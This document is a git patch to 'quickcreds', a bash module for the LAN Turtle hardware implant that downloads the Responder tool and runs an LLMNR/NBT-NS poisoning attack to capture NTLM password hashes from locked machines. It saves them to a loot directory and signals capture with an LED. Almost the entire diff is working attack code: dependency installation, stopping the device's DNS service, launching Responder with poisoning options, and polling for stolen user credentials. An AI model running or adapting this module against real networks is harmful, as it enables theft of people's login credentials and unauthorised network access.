From 1452617da4138203f62304dfbb8793cca36803c7 Mon Sep 17 00:00:00 2001 From: Theo Date: Fri, 9 Apr 2021 23:49:35 +0200 Subject: [PATCH] Fixed quickcreds with new responder size. (#43) * Fixed quickcreds with new responder size. Forces use of SD card amongst some other small fixes. * corrected fixes * remove comments * fixed indexing * Fixed indexing * QuickCreds: Remove all trailing whitespace, fix indentation, drop unwanted comments * Removed odd comment Co-authored-by: Marc Egerton --- modules/quickcreds | 274 ++++++++++++++++++++++++--------------------- 1 file changed, 148 insertions(+), 126 deletions(-) diff --git a/modules/quickcreds b/modules/quickcreds index 9081c72..5e3d064 100644 --- a/modules/quickcreds +++ b/modules/quickcreds @@ -1,8 +1,9 @@ #!/bin/bash /usr/lib/turtle/turtle_module -VERSION="1.3" -DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix." +VERSION="1.4" +DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the LED will light solid. Author: Hak5Darren. Credit: Mubix." CONF=/tmp/QuickCreds.form +# All "dialog" functionality is related to the Turtle shell : ${DIALOG_OK=0} : ${DIALOG_CANCEL=1} : ${DIALOG_HELP=2} @@ -10,139 +11,160 @@ CONF=/tmp/QuickCreds.form : ${DIALOG_ITEM_HELP=4} : ${DIALOG_ESC=255} +LOOTDIR="/root/loot/quickcreds/" +RESPLOG=$LOOTDIR"responder.log" +RESPROOT="/sd" +RESPTEMPDL="/tmp/ResponderDownload/" +RESPURL="https://github.com/lgandx/Responder/archive/master.zip" +RESPLOGDIR=$RESPROOT/"Responder/logs" +SLEEPTIMER="1" + function configure { -# dialog --title "QuickCreds" --msgbox "\n\ -# Dependencies will be installed. An Internet connection is required.\n\ -# Upon configuration creds will be saved to /root/loot/ on boot." 9 72 - -dialog --title "QuickCreds" \ ---yesno "\nInstall dependencies and configure QuickCreds?\n\ -An Internet connection is required for installation.\n" 8 60 -response=$? -case $response in - 0) ;; - 1) exit ;; - 255) exit ;; -esac - -# Check to see if QuickCreds has already been configured -if [[ -d /root/loot || -s /root/loot/responder.log ]]; -then - dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\ -Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72 - exit 1 -fi - -# Check for Internet connection -ping -q -w 5 -c 1 lanturtle.com &> /dev/null && { - : -} || { - dialog --title "QuickCreds" --msgbox "\n\ -The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72 - exit 1 -} - -# Install dependencies -opkg update | dialog --progressbox "Updating opkg" 14 72 - -if [[ ! $(opkg list-installed | grep python-sqlite3) ]]; - then - opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72 -fi - -if [[ ! $(opkg list-installed | grep screen) ]]; - then - opkg install screen | dialog --progressbox "Installing dependency screen" 14 72 -fi - -if [[ ! $(opkg list-installed | grep python-openssl) ]]; - then - opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72 -fi - -if [[ ! $(opkg list-installed | grep coreutils-sleep) ]]; - then - opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72 -fi - -if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; -then - rm -rf /etc/turtle/Responder - rm -rf /tmp/v2.3.3.5.tar.gz* - wget --progress=dot https://github.com/lgandx/Responder/archive/v2.3.3.5.tar.gz -P /tmp 2>&1 | dialog --progressbox "Download dependency responder" 14 72 - mkdir /etc/turtle/Responder - tar xzf /tmp/v2.3.3.5.tar.gz -C /etc/turtle/Responder 2>&1 | dialog --progressbox "Install dependency responder" 14 72 - rm -rf /tmp/v2.3.3.5.tar.gz* -fi - -# Setup loot directory and complete setup -mkdir /root/loot -touch /root/loot/responder.log - - dialog --title "QuickCreds" --msgbox "\n\ -Configuration complete. Creds will be saved to /root/loot\n\ -Enable this module to have it start the attack on boot.\n" 9 72 -} - -function start { -# Stop on-off-on DHCP blink pattern script -echo "Stopping DHCP Detect Blink Script" -/etc/init.d/dhcp_detect stop -echo "" -echo "QuickCreds started." -echo "LED will blink rapidly while QuickCreds is running." -echo "LED will light solid upon NTLM hash capture." -echo "" -echo "If starting this module from the Turtle Shell menu," -echo "press CTRL+C to return." - -echo "Starting attack..." >> /root/loot/responder.log - -# Create new numbered loot directory and symlink it from Responder logs -cd /root/loot -dircount=$(ls -lad /root/loot/* | wc -l) -mkdir /root/loot/$((dircount)) -# Delete all current Responder logs -rm -rf /etc/turtle/Responder/logs -ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs - -# Stop dnsmasq -/etc/init.d/dnsmasq stop 1&> /dev/null - -# Execute attack -screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P' - -# Blink upon hash capture -while true; do -# Grep for user creds and do not match on machine creds, machine usernames end in $ -if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ]; - then - if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]] - then - echo "Creds saved!" >> /root/loot/responder.log -#copy all responder logs to loot directory - cp /etc/turtle/Responder/logs/* /root/loot/$((dircount)) - finished + # If SD card is mounted continue if not fail due to not enough space. + if grep -qs $RESPROOT /proc/mounts; then + /bin/echo "SD card is mounted." + else + /usr/bin/dialog --title "QuickCreds" --msgbox "An SD card is required to install this module." 9 72 + exit 1 fi -fi - echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1 - sleep 1 - echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1 - sleep 1 -done + + # Ask if the user really wants to install the module and its dependencies + /usr/bin/dialog --title "QuickCreds" --yesno "\nInstall dependencies and configure QuickCreds?\nAn Internet connection is required for installation.\n" 8 60 + response=$? + case $response in + 0) ;; + 1) exit ;; + 255) exit ;; + esac + + # Check to see if QuickCreds has already been configured + if [[ -d "$LOOTDIR" || -s "$RESPLOG" ]]; then + /usr/bin/dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\nCreds are saved to $LOOTDIR.\nEnable this module to attack on boot." 9 72 + exit 1 + fi + + # Check for Internet connection + /bin/ping -q -w 5 -c 1 www.google.com &> /dev/null && { + : + } || { + /usr/bin/dialog --title "QuickCreds" --msgbox "\nThe LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again." 9 72 + exit 1 + } + + # Install dependencies + /bin/opkg update | /usr/bin/dialog --progressbox "Updating opkg" 14 72 + + if [[ ! $(/bin/opkg list-installed | /bin/grep python-sqlite3) ]]; then + /bin/opkg install python-sqlite3 | /usr/bin/dialog --progressbox "Installing dependency python-sqlite3" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep screen) ]]; then + /bin/opkg install screen | /usr/bin/dialog --progressbox "Installing dependency screen" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep python-openssl) ]]; then + /bin/opkg install python-openssl | /usr/bin/dialog --progressbox "Installing dependency python-openssl" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep coreutils-sleep) ]]; then + /bin/opkg install coreutils-sleep | /usr/bin/dialog --progressbox "Installing dependency coreutils-sleep" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep unzip) ]]; then + /bin/opkg install unzip | /usr/bin/dialog --progressbox "Installing dependency unzip" 14 72 + fi + + # Check if Responder is installed (not the module available in the Turtle "GUI", but the tool taken straight from GitHub) + if [[ ! -d "$RESPROOT" || ! -s "$RESPROOT"Responder.py ]]; then + # Clean up + /bin/rm -rf "$RESPROOT"Responder/ + /bin/rm -rf "$RESPTEMPDL"master.zip* + # Create new + /bin/mkdir -p "$RESPTEMPDL" + # Download and extract + /usr/bin/wget --progress=dot "$RESPURL" -P "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Download dependency responder" 14 72 + # Unpack the GitHub download + /usr/bin/unzip "$RESPTEMPDL"master.zip -d "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Unpacking dependency responder" 14 72 + /bin/rm "$RESPTEMPDL"Responder-master/tools/MultiRelay/bin/*.exe + /bin/mv "$RESPTEMPDL"Responder-master "$RESPTEMPDL"Responder + /bin/mv "$RESPTEMPDL"Responder "$RESPROOT" + /bin/rm -rf "$RESPTEMPDL"master.zip* + fi + + # Setup loot directory and complete setup + /bin/mkdir -p "$LOOTDIR" + + /usr/bin/dialog --title "QuickCreds" --msgbox "\nConfiguration complete. Creds will be saved to $LOOTDIR\nEnable this module to have it start the attack on boot.\n" 9 72 } function finished { - echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1 - exit + /bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1 + /bin/sync + exit +} + +function start { + # Stop on-off-on DHCP blink pattern script, this is what causes the "Terminated" text to appear if running QuickCreds from within the Turtle module system in the Turtle "GUI" + /bin/echo "Stopping DHCP Detect Blink Script" + /etc/init.d/dhcp_detect stop + /bin/echo "" + /bin/echo "QuickCreds started." + /bin/echo "The orange LED will blink while QuickCreds is running." + /bin/echo "The orange LED will turn solid upon NTLM hash capture." + /bin/echo "" + /bin/echo "If starting this module from the Turtle Shell menu," + /bin/echo "press CTRL+C to return." + + # Create new numbered loot directory and symlink it from Responder logs + /bin/mkdir -p $LOOTDIR + cd $LOOTDIR + dircount=$(/bin/ls -lad $LOOTDIR/* | /usr/bin/wc -l) + # Adjust the number when creating the numbered lootdir for this session, if no existing dirs (i.e. wc -l = 0) then start with 1 instead of 0 otherwise there will be a gap between 0 and 2 + if [[ $((dircount)) == 0 ]]; then dircount=1 ; fi + /bin/mkdir $LOOTDIR"Creds"$((dircount)) + # Delete all current Responder logs + /bin/rm -rf $RESPLOGDIR + /bin/ln -s $LOOTDIR"Creds"$((dircount)) $RESPLOGDIR + + # Saving interface info, surplus information and can be deleted + /sbin/ifconfig > $LOOTDIR"Creds"$((dircount))/ifconfig_dump.log + + /bin/echo "Creds$((dircount)) - Initiating Responder attack..." >> $RESPLOG + + # Stop dnsmasq + /bin/echo "Creds$((dircount)) - Stopping dnsmasq" >> $RESPLOG + /etc/init.d/dnsmasq stop 1&> /dev/null + + # Execute attack + /bin/echo "Creds$((dircount)) - Starting screen and Responder" >> $RESPLOG + /usr/sbin/screen -dmS responder /bin/bash -c 'cd /sd/Responder; /usr/bin/python /sd/Responder/Responder.py -I eth0 -w -r -d -P' + + /bin/echo "Creds$((dircount)) - LED blink pattern during attack enabled" >> $RESPLOG + # Blink upon hash capture + while true; do + # Grep for user creds and do not match on machine creds, machine usernames end in $ + if [[ $(/bin/grep -v '\$:' $RESPLOGDIR/*NTLM* 2>/dev/null) ]]; then + /bin/echo "Creds$((dircount)) - Found user creds NTLM file in the logs directory!" >> $RESPLOG + /bin/echo "Creds$((dircount)) - Creds obtained and saved" >> $RESPLOG + #Copy all responder logs to loot directory + /bin/echo "Creds$((dircount)) - Copying the Responder native logs to loot directory" >> $RESPLOG + /bin/cp $RESPLOGDIR/* $LOOTDIR"Creds"$((dircount)) + /bin/echo "Creds$((dircount)) - Calling the finished function" >> $RESPLOG + finished + fi + /bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1 + /bin/sleep $SLEEPTIMER + /bin/echo 0 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1 + /bin/sleep $SLEEPTIMER + done } function stop { - kill $(ps | grep [R]esponder | awk {'print $1'}) - /etc/init.d/dnsmasq start 1&> /dev/null - echo "QuickCreds Stopped" + /bin/kill $(/bin/ps | /bin/grep [R]esponder | /usr/bin/awk {'print $1'}) + /etc/init.d/dnsmasq start 1&> /dev/null + /bin/echo "QuickCreds Stopped" } function status { - if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi + if [[ $(/bin/ps | /bin/grep -w [R]esponder.py) ]]; then /bin/echo "1"; else /bin/echo "0"; fi }